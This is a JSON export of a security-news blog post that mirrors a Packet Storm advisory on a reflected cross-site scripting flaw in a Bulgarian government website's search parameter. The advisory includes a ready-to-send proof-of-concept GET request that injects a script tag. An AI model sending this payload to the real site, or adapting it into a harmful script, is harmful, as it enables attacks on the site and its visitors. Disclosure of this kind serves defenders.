{"id":36303,"date":"2026-01-19T12:36:40","date_gmt":"2026-01-19T12:36:40","guid":{"rendered":"http:\/\/localhost\/?p=36303"},"modified":"2026-01-19T12:36:40","modified_gmt":"2026-01-19T12:36:40","slug":"ahumlspgovernmentbg-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=36303","title":{"rendered":"\ud83d\udcc4 ahu.mlsp.government.bg Cross Site Scripting_PACKETSTORM:214049"},"content":{"rendered":"

{“lastseen”:”2026-01-19T17:51:48″,”description”:”ahu.mlsp.government.bg suffers from a cross site scripting issue. The researcher has waited over a year after reporting this to make public, so hopefully this will encourage them to fix it…”,”published”:”2026-01-19T00:00:00″,”modified”:”2026-01-19T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 ahu.mlsp.government.bg Cross Site Scripting”,”source”:””,”references”:””,”id”:”PACKETSTORM:214049″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”## Titles: ahu.mlsp.government.bg-XSS-Reflected-CRITICAL Cross-site scripting (reflected)\\n ## Author: nu11secur1ty\\n ## Date: 1\/18\/2026\\n ## Vendor: ahu.mlsp.government.bg\\n ## Software: ahu.mlsp.government.bg\\n ## Reference: https:\/\/portswigger.net\/web-security\/cross-site-scripting\\n \\n ## Description:\\n The value of the `keywords` request parameter is copied into the HTML\\n document as plain text between tags. The payload\\n fpizv\\u003cscript\\u003ealert(1)\\u003c\/script\\u003eb6a49ruc4py was submitted in the keywords\\n parameter. This input was echoed unmodified in the application’s response.\\n This proof-of-concept attack demonstrates that it is possible to inject\\n arbitrary JavaScript into the application’s response. The original request\\n used the POST method, however it was possible to convert the request to use\\n the GET method, to enable easier demonstration and delivery of the attack.\\n \\n STATUS: HIGH- Vulnerability\\n \\n [+]PoC:\\n “`\\n GET \/search\/?keywords=fpizv%3cscript%3ealert(1)%3c%2fscript%3eb6a49ruc4py\\n HTTP\/1.1\\n Host: ahu.mlsp.government.bg\\n Cache-Control: max-age=0\\n Sec-CH-UA: \\”Chromium\\”;v=\\”143\\”, \\”Not;A=Brand\\”;v=\\”24\\”, \\”Google Chrome\\”;v=\\”143\\”\\n Sec-CH-UA-Mobile: ?0\\n Sec-CH-UA-Platform: \\”Windows\\”\\n Accept-Language: en-US;q=0.9,en;q=0.8\\n User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36\\n (KHTML, like Gecko) Chrome\/143.0.0.0 Safari\/537.36\\n Accept:\\n text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.7\\n Sec-Fetch-Site: none\\n Sec-Fetch-Mode: navigate\\n Sec-Fetch-User: ?1\\n Sec-Fetch-Dest: document\\n Accept-Encoding: gzip, deflate, br\\n Connection: close\\n Cookie: JSESSIONID=B73DAEC7FBA9D531A0EA45F18C6A5B19\\n Origin: null\\n Upgrade-Insecure-Requests: 1\\n \\n “`\\n \\n ## Demo PoC:\\n [href](https:\/\/www.patreon.com\/posts\/ahu-mlsp-bg-xss-148520630)\\n \\n ## Time spent:\\n 01:27:00″,”sourceHref”:”https:\/\/packetstorm.news\/download\/214049″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/214049\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-01-19T17:51:48″,”description”:”ahu.mlsp.government.bg suffers from a cross site scripting issue. The researcher has waited over a year after reporting this to make public, so hopefully this will…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-36303","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 ahu.mlsp.government.bg Cross Site Scripting_PACKETSTORM:214049 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=36303\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 ahu.mlsp.government.bg Cross Site Scripting_PACKETSTORM:214049 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-01-19T17:51:48″,”description”:”ahu.mlsp.government.bg suffers from a cross site scripting issue. The researcher has waited over a year after reporting this to make public, so hopefully this will...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=36303\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-01-19T12:36:40+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=36303#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=36303\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 ahu.mlsp.government.bg Cross Site Scripting_PACKETSTORM:214049\",\"datePublished\":\"2026-01-19T12:36:40+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=36303\"},\"wordCount\":428,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=36303#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=36303\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=36303\",\"name\":\"\ud83d\udcc4 ahu.mlsp.government.bg Cross Site Scripting_PACKETSTORM:214049 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-01-19T12:36:40+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=36303#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=36303\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=36303#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 ahu.mlsp.government.bg Cross Site Scripting_PACKETSTORM:214049\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 ahu.mlsp.government.bg Cross Site Scripting_PACKETSTORM:214049 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=36303","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 ahu.mlsp.government.bg Cross Site Scripting_PACKETSTORM:214049 - zero redgem","og_description":"{“lastseen”:”2026-01-19T17:51:48″,”description”:”ahu.mlsp.government.bg suffers from a cross site scripting issue. The researcher has waited over a year after reporting this to make public, so hopefully this will...","og_url":"https:\/\/zero.redgem.net\/?p=36303","og_site_name":"zero redgem","article_published_time":"2026-01-19T12:36:40+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=36303#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=36303"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 ahu.mlsp.government.bg Cross Site Scripting_PACKETSTORM:214049","datePublished":"2026-01-19T12:36:40+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=36303"},"wordCount":428,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=36303#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=36303","url":"https:\/\/zero.redgem.net\/?p=36303","name":"\ud83d\udcc4 ahu.mlsp.government.bg Cross Site Scripting_PACKETSTORM:214049 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-01-19T12:36:40+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=36303#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=36303"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=36303#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 ahu.mlsp.government.bg Cross Site Scripting_PACKETSTORM:214049"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/36303","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=36303"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/36303\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=36303"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=36303"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=36303"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}